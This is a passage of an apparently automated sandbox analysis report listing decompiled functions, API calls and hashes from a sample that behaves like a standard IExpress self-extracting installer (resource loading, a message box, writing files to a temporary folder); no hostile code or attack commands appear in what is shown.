                                                                                                                                                                                                                                              • GlobalLock.KERNEL32 ref: 00A82969
                                                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00A83938,?,?,?,?,-00000005,?), ref: 00A82A21
                                                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 00A82A81
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3949799724-0
                                                                                                                                                                                                                                              • Opcode ID: b72dafabaa30a2ce4b0be6369c1471a0d27038ec7ae1a961baea24584acc05b9
                                                                                                                                                                                                                                              • Instruction ID: 9e22cde5a4be9c4b592d94b06f89a62e76575dab8b8b4d76a2fdda8083df3c2f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b72dafabaa30a2ce4b0be6369c1471a0d27038ec7ae1a961baea24584acc05b9
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5D511931E00219EFDB25EF98D884ABEFBB9FF48740F14416AE915E3221DB319941DB90
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 32%
                                                                                                                                                                                                                                              			E00A84169(void* __eflags) {
                                                                                                                                                                                                                                              				int _t18;
                                                                                                                                                                                                                                              				void* _t21;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t20 = E00A8468F("FINISHMSG", 0, 0);
                                                                                                                                                                                                                                              				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
                                                                                                                                                                                                                                              				if(_t21 != 0) {
                                                                                                                                                                                                                                              					if(E00A8468F("FINISHMSG", _t21, _t20) != 0) {
                                                                                                                                                                                                                                              						if(lstrcmpA(_t21, "<None>") == 0) {
                                                                                                                                                                                                                                              							L7:
                                                                                                                                                                                                                                              							return LocalFree(_t21);
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_push(0);
                                                                                                                                                                                                                                              						_push(0x40);
                                                                                                                                                                                                                                              						_push(0);
                                                                                                                                                                                                                                              						_push(_t21);
                                                                                                                                                                                                                                              						_t18 = 0x3e9;
                                                                                                                                                                                                                                              						L6:
                                                                                                                                                                                                                                              						E00A844B9(0, _t18);
                                                                                                                                                                                                                                              						goto L7;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                                                                              					_push(0x10);
                                                                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                                                                              					_t18 = 0x4b1;
                                                                                                                                                                                                                                              					goto L6;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E00A844B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              			}





                                                                                                                                                                                                                                              0x00a8417d
                                                                                                                                                                                                                                              0x00a8418f
                                                                                                                                                                                                                                              0x00a84193
                                                                                                                                                                                                                                              0x00a841b7
                                                                                                                                                                                                                                              0x00a841d3
                                                                                                                                                                                                                                              0x00a841e6
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a841e7
                                                                                                                                                                                                                                              0x00a841d5
                                                                                                                                                                                                                                              0x00a841d6
                                                                                                                                                                                                                                              0x00a841d8
                                                                                                                                                                                                                                              0x00a841d9
                                                                                                                                                                                                                                              0x00a841da
                                                                                                                                                                                                                                              0x00a841df
                                                                                                                                                                                                                                              0x00a841e1
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a841e1
                                                                                                                                                                                                                                              0x00a841b9
                                                                                                                                                                                                                                              0x00a841ba
                                                                                                                                                                                                                                              0x00a841bc
                                                                                                                                                                                                                                              0x00a841bd
                                                                                                                                                                                                                                              0x00a841be
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a841be
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A846A0
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: SizeofResource.KERNEL32(00000000,00000000,?,00A82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A846A9
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A846C3
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: LoadResource.KERNEL32(00000000,00000000,?,00A82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A846CC
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: LockResource.KERNEL32(00000000,?,00A82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A846D3
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: memcpy_s.MSVCRT ref: 00A846E5
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A846EF
                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,00A830B4), ref: 00A84189
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,00A830B4), ref: 00A841E7
                                                                                                                                                                                                                                                • Part of subcall function 00A844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A84518
                                                                                                                                                                                                                                                • Part of subcall function 00A844B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A84554
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                                                              • String ID: <None>$FINISHMSG
                                                                                                                                                                                                                                              • API String ID: 3507850446-3091758298
                                                                                                                                                                                                                                              • Opcode ID: 287a1b6bd2f413e14b2e9404791cc7d26e91ca85da3e693c05ac35c959916c70
                                                                                                                                                                                                                                              • Instruction ID: e2865f37bca4e2a8cfcb842c49a13b68461b26223a40b46cb215bbc84208229e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 287a1b6bd2f413e14b2e9404791cc7d26e91ca85da3e693c05ac35c959916c70
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B101F4B17003167BF32477A54C8AF7B659EDBE8795F004236B705E5180DA68DC024375
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                                                                                                              			E00A819E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v520;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t11;
                                                                                                                                                                                                                                              				void* _t14;
                                                                                                                                                                                                                                              				void* _t23;
                                                                                                                                                                                                                                              				void* _t27;
                                                                                                                                                                                                                                              				void* _t33;
                                                                                                                                                                                                                                              				struct HWND__* _t34;
                                                                                                                                                                                                                                              				signed int _t35;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t33 = __edi;
                                                                                                                                                                                                                                              				_t27 = __ebx;
                                                                                                                                                                                                                                              				_t11 =  *0xa88004; // 0xd891196d
                                                                                                                                                                                                                                              				_v8 = _t11 ^ _t35;
                                                                                                                                                                                                                                              				_t34 = _a4;
                                                                                                                                                                                                                                              				_t14 = _a8 - 0x110;
                                                                                                                                                                                                                                              				if(_t14 == 0) {
                                                                                                                                                                                                                                              					_t32 = GetDesktopWindow();
                                                                                                                                                                                                                                              					E00A843D0(_t34, _t15);
                                                                                                                                                                                                                                              					_v520 = 0;
                                                                                                                                                                                                                                              					LoadStringA( *0xa89a3c, _a16,  &_v520, 0x200);
                                                                                                                                                                                                                                              					SetDlgItemTextA(_t34, 0x83f,  &_v520);
                                                                                                                                                                                                                                              					MessageBeep(0xffffffff);
                                                                                                                                                                                                                                              					goto L6;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					if(_t14 != 1) {
                                                                                                                                                                                                                                              						L4:
                                                                                                                                                                                                                                              						_t23 = 0;
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						_t32 = _a12;
                                                                                                                                                                                                                                              						if(_t32 - 0x83d > 1) {
                                                                                                                                                                                                                                              							goto L4;
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							EndDialog(_t34, _t32);
                                                                                                                                                                                                                                              							L6:
                                                                                                                                                                                                                                              							_t23 = 1;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E00A86CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                                                                                                                                                                                              			}













                                                                                                                                                                                                                                              0x00a819e0
                                                                                                                                                                                                                                              0x00a819e0
                                                                                                                                                                                                                                              0x00a819eb
                                                                                                                                                                                                                                              0x00a819f2
                                                                                                                                                                                                                                              0x00a819f9
                                                                                                                                                                                                                                              0x00a819fc
                                                                                                                                                                                                                                              0x00a81a01
                                                                                                                                                                                                                                              0x00a81a2a
                                                                                                                                                                                                                                              0x00a81a2e
                                                                                                                                                                                                                                              0x00a81a3e
                                                                                                                                                                                                                                              0x00a81a4f
                                                                                                                                                                                                                                              0x00a81a62
                                                                                                                                                                                                                                              0x00a81a6a
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a81a03
                                                                                                                                                                                                                                              0x00a81a06
                                                                                                                                                                                                                                              0x00a81a20
                                                                                                                                                                                                                                              0x00a81a20
                                                                                                                                                                                                                                              0x00a81a08
                                                                                                                                                                                                                                              0x00a81a08
                                                                                                                                                                                                                                              0x00a81a14
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a81a16
                                                                                                                                                                                                                                              0x00a81a18
                                                                                                                                                                                                                                              0x00a81a70
                                                                                                                                                                                                                                              0x00a81a72
                                                                                                                                                                                                                                              0x00a81a72
                                                                                                                                                                                                                                              0x00a81a14
                                                                                                                                                                                                                                              0x00a81a06
                                                                                                                                                                                                                                              0x00a81a81

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • EndDialog.USER32(?,?), ref: 00A81A18
                                                                                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 00A81A24
                                                                                                                                                                                                                                              • LoadStringA.USER32(?,?,00000200), ref: 00A81A4F
                                                                                                                                                                                                                                              • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00A81A62
                                                                                                                                                                                                                                              • MessageBeep.USER32(000000FF), ref: 00A81A6A
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1273765764-0
                                                                                                                                                                                                                                              • Opcode ID: cddbdc02e01676f3c5eb795b9de0272575d43ec5558d37a246f9d0e8b0d1574b
                                                                                                                                                                                                                                              • Instruction ID: 65abc837e2deba7a2a10ac3bf35f0f9258f18ba753a271972df290aa846dec2d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cddbdc02e01676f3c5eb795b9de0272575d43ec5558d37a246f9d0e8b0d1574b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6B11E131500109AFEB04FFA4DE4CAAEBBB8EF19340F008251F91296190DB349E02CB91
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E00A87155() {
                                                                                                                                                                                                                                              				void* _v8;
                                                                                                                                                                                                                                              				struct _FILETIME _v16;
                                                                                                                                                                                                                                              				signed int _v20;
                                                                                                                                                                                                                                              				union _LARGE_INTEGER _v24;
                                                                                                                                                                                                                                              				signed int _t23;
                                                                                                                                                                                                                                              				signed int _t36;
                                                                                                                                                                                                                                              				signed int _t37;
                                                                                                                                                                                                                                              				signed int _t39;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
                                                                                                                                                                                                                                              				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
                                                                                                                                                                                                                                              				_t23 =  *0xa88004; // 0xd891196d
                                                                                                                                                                                                                                              				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
                                                                                                                                                                                                                                              					GetSystemTimeAsFileTime( &_v16);
                                                                                                                                                                                                                                              					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
                                                                                                                                                                                                                                              					_v8 = _v8 ^ GetCurrentProcessId();
                                                                                                                                                                                                                                              					_v8 = _v8 ^ GetCurrentThreadId();
                                                                                                                                                                                                                                              					_v8 = GetTickCount() ^ _v8 ^  &_v8;
                                                                                                                                                                                                                                              					QueryPerformanceCounter( &_v24);
                                                                                                                                                                                                                                              					_t36 = _v20 ^ _v24.LowPart ^ _v8;
                                                                                                                                                                                                                                              					_t39 = _t36;
                                                                                                                                                                                                                                              					if(_t36 == 0xbb40e64e || ( *0xa88004 & 0xffff0000) == 0) {
                                                                                                                                                                                                                                              						_t36 = 0xbb40e64f;
                                                                                                                                                                                                                                              						_t39 = 0xbb40e64f;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					 *0xa88004 = _t39;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t37 =  !_t36;
                                                                                                                                                                                                                                              				 *0xa88008 = _t37;
                                                                                                                                                                                                                                              				return _t37;
                                                                                                                                                                                                                                              			}











                                                                                                                                                                                                                                              0x00a8715d
                                                                                                                                                                                                                                              0x00a87161
                                                                                                                                                                                                                                              0x00a87165
                                                                                                                                                                                                                                              0x00a87178
                                                                                                                                                                                                                                              0x00a87182
                                                                                                                                                                                                                                              0x00a8718e
                                                                                                                                                                                                                                              0x00a87197
                                                                                                                                                                                                                                              0x00a871a0
                                                                                                                                                                                                                                              0x00a871b1
                                                                                                                                                                                                                                              0x00a871b8
                                                                                                                                                                                                                                              0x00a871c4
                                                                                                                                                                                                                                              0x00a871c7
                                                                                                                                                                                                                                              0x00a871cb
                                                                                                                                                                                                                                              0x00a871d5
                                                                                                                                                                                                                                              0x00a871da
                                                                                                                                                                                                                                              0x00a871da
                                                                                                                                                                                                                                              0x00a871dc
                                                                                                                                                                                                                                              0x00a871dc
                                                                                                                                                                                                                                              0x00a871e2
                                                                                                                                                                                                                                              0x00a871e5
                                                                                                                                                                                                                                              0x00a871ee

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00A87182
                                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 00A87191
                                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00A8719A
                                                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00A871A3
                                                                                                                                                                                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 00A871B8
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1445889803-0
                                                                                                                                                                                                                                              • Opcode ID: d25d92db91eb8bd08a8dbfbbfcab029a3637280ba8934dea9abe94a44541f0ce
                                                                                                                                                                                                                                              • Instruction ID: 33b00c3086383677f9c92c7c86a6e69745c750e5c1e7dc598beebbe415f48079
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d25d92db91eb8bd08a8dbfbbfcab029a3637280ba8934dea9abe94a44541f0ce
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6F114C71D01208DFCB10DFF8DA4CA9EBBF4EF18310FA14A56D906E7220EB349A058B41
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 88%
                                                                                                                                                                                                                                              			E00A863C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				long _v272;
                                                                                                                                                                                                                                              				void* _v276;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t15;
                                                                                                                                                                                                                                              				long _t28;
                                                                                                                                                                                                                                              				struct _OVERLAPPED* _t37;
                                                                                                                                                                                                                                              				void* _t39;
                                                                                                                                                                                                                                              				signed int _t40;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t15 =  *0xa88004; // 0xd891196d
                                                                                                                                                                                                                                              				_v8 = _t15 ^ _t40;
                                                                                                                                                                                                                                              				_v272 = _v272 & 0x00000000;
                                                                                                                                                                                                                                              				_push(__ecx);
                                                                                                                                                                                                                                              				_v276 = _a16;
                                                                                                                                                                                                                                              				_t37 = 1;
                                                                                                                                                                                                                                              				E00A81781( &_v268, 0x104, __ecx, "C:\Users\jones\AppData\Local\Temp\IXP002.TMP\");
                                                                                                                                                                                                                                              				E00A8658A( &_v268, 0x104, _a12);
                                                                                                                                                                                                                                              				_t28 = 0;
                                                                                                                                                                                                                                              				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
                                                                                                                                                                                                                                              				if(_t39 != 0xffffffff) {
                                                                                                                                                                                                                                              					_t28 = _a4;
                                                                                                                                                                                                                                              					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
                                                                                                                                                                                                                                              						 *0xa89124 = 0x80070052;
                                                                                                                                                                                                                                              						_t37 = 0;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					CloseHandle(_t39);
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					 *0xa89124 = 0x80070052;
                                                                                                                                                                                                                                              					_t37 = 0;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E00A86CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
                                                                                                                                                                                                                                              			}















                                                                                                                                                                                                                                              0x00a863cb
                                                                                                                                                                                                                                              0x00a863d2
                                                                                                                                                                                                                                              0x00a863d8
                                                                                                                                                                                                                                              0x00a863ea
                                                                                                                                                                                                                                              0x00a863f3
                                                                                                                                                                                                                                              0x00a86401
                                                                                                                                                                                                                                              0x00a86402
                                                                                                                                                                                                                                              0x00a86410
                                                                                                                                                                                                                                              0x00a86415
                                                                                                                                                                                                                                              0x00a86433
                                                                                                                                                                                                                                              0x00a86438
                                                                                                                                                                                                                                              0x00a86449
                                                                                                                                                                                                                                              0x00a86463
                                                                                                                                                                                                                                              0x00a8646d
                                                                                                                                                                                                                                              0x00a86477
                                                                                                                                                                                                                                              0x00a86477
                                                                                                                                                                                                                                              0x00a8647a
                                                                                                                                                                                                                                              0x00a8643a
                                                                                                                                                                                                                                              0x00a8643a
                                                                                                                                                                                                                                              0x00a86444
                                                                                                                                                                                                                                              0x00a86444
                                                                                                                                                                                                                                              0x00a86492

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 00A8642D
                                                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 00A8645B
                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 00A8647A
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00A863EB
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                                                                                                                                                                                                              • API String ID: 1065093856-1610346413
                                                                                                                                                                                                                                              • Opcode ID: 902aa6e38c789997a30e0d8e8e688a0a44daeeb5c7bd36b52985629438905199
                                                                                                                                                                                                                                              • Instruction ID: 87016037b562b59c9f3ada3c999c672ed19ea4667b9ce01b8fa1626bccad4cf3
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 902aa6e38c789997a30e0d8e8e688a0a44daeeb5c7bd36b52985629438905199
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8C21C071A00218ABEB10EF65DCC5FEB73B8EB54314F0042A9A585A7280DAB05D858FA4
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E00A847E0(intOrPtr* __ecx) {
                                                                                                                                                                                                                                              				intOrPtr _t6;
                                                                                                                                                                                                                                              				intOrPtr _t9;
                                                                                                                                                                                                                                              				void* _t11;
                                                                                                                                                                                                                                              				void* _t19;
                                                                                                                                                                                                                                              				intOrPtr* _t22;
                                                                                                                                                                                                                                              				void _t24;
                                                                                                                                                                                                                                              				struct HWND__* _t25;
                                                                                                                                                                                                                                              				struct HWND__* _t26;
                                                                                                                                                                                                                                              				void* _t27;
                                                                                                                                                                                                                                              				intOrPtr* _t28;
                                                                                                                                                                                                                                              				intOrPtr* _t33;
                                                                                                                                                                                                                                              				void* _t34;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t33 = __ecx;
                                                                                                                                                                                                                                              				_t34 = LocalAlloc(0x40, 8);
                                                                                                                                                                                                                                              				if(_t34 != 0) {
                                                                                                                                                                                                                                              					_t22 = _t33;
                                                                                                                                                                                                                                              					_t27 = _t22 + 1;
                                                                                                                                                                                                                                              					do {
                                                                                                                                                                                                                                              						_t6 =  *_t22;
                                                                                                                                                                                                                                              						_t22 = _t22 + 1;
                                                                                                                                                                                                                                              					} while (_t6 != 0);
                                                                                                                                                                                                                                              					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
                                                                                                                                                                                                                                              					 *_t34 = _t24;
                                                                                                                                                                                                                                              					if(_t24 != 0) {
                                                                                                                                                                                                                                              						_t28 = _t33;
                                                                                                                                                                                                                                              						_t19 = _t28 + 1;
                                                                                                                                                                                                                                              						do {
                                                                                                                                                                                                                                              							_t9 =  *_t28;
                                                                                                                                                                                                                                              							_t28 = _t28 + 1;
                                                                                                                                                                                                                                              						} while (_t9 != 0);
                                                                                                                                                                                                                                              						E00A81680(_t24, _t28 - _t19 + 1, _t33);
                                                                                                                                                                                                                                              						_t11 =  *0xa891e0; // 0x808e20
                                                                                                                                                                                                                                              						 *(_t34 + 4) = _t11;
                                                                                                                                                                                                                                              						 *0xa891e0 = _t34;
                                                                                                                                                                                                                                              						return 1;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t25 =  *0xa88584; // 0x0
                                                                                                                                                                                                                                              					E00A844B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                                                              					LocalFree(_t34);
                                                                                                                                                                                                                                              					L2:
                                                                                                                                                                                                                                              					return 0;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t26 =  *0xa88584; // 0x0
                                                                                                                                                                                                                                              				E00A844B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
                                                                                                                                                                                                                                              				goto L2;
                                                                                                                                                                                                                                              			}















                                                                                                                                                                                                                                              0x00a847e8
                                                                                                                                                                                                                                              0x00a847f0
                                                                                                                                                                                                                                              0x00a847f4
                                                                                                                                                                                                                                              0x00a8480f
                                                                                                                                                                                                                                              0x00a84811
                                                                                                                                                                                                                                              0x00a84814
                                                                                                                                                                                                                                              0x00a84814
                                                                                                                                                                                                                                              0x00a84816
                                                                                                                                                                                                                                              0x00a84817
                                                                                                                                                                                                                                              0x00a84829
                                                                                                                                                                                                                                              0x00a8482b
                                                                                                                                                                                                                                              0x00a8482f
                                                                                                                                                                                                                                              0x00a8484f
                                                                                                                                                                                                                                              0x00a84852
                                                                                                                                                                                                                                              0x00a84855
                                                                                                                                                                                                                                              0x00a84855
                                                                                                                                                                                                                                              0x00a84857
                                                                                                                                                                                                                                              0x00a84858
                                                                                                                                                                                                                                              0x00a84860
                                                                                                                                                                                                                                              0x00a84865
                                                                                                                                                                                                                                              0x00a8486a
                                                                                                                                                                                                                                              0x00a8486f
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a84876
                                                                                                                                                                                                                                              0x00a84831
                                                                                                                                                                                                                                              0x00a84841
                                                                                                                                                                                                                                              0x00a84847
                                                                                                                                                                                                                                              0x00a8480b
                                                                                                                                                                                                                                              0x00000000
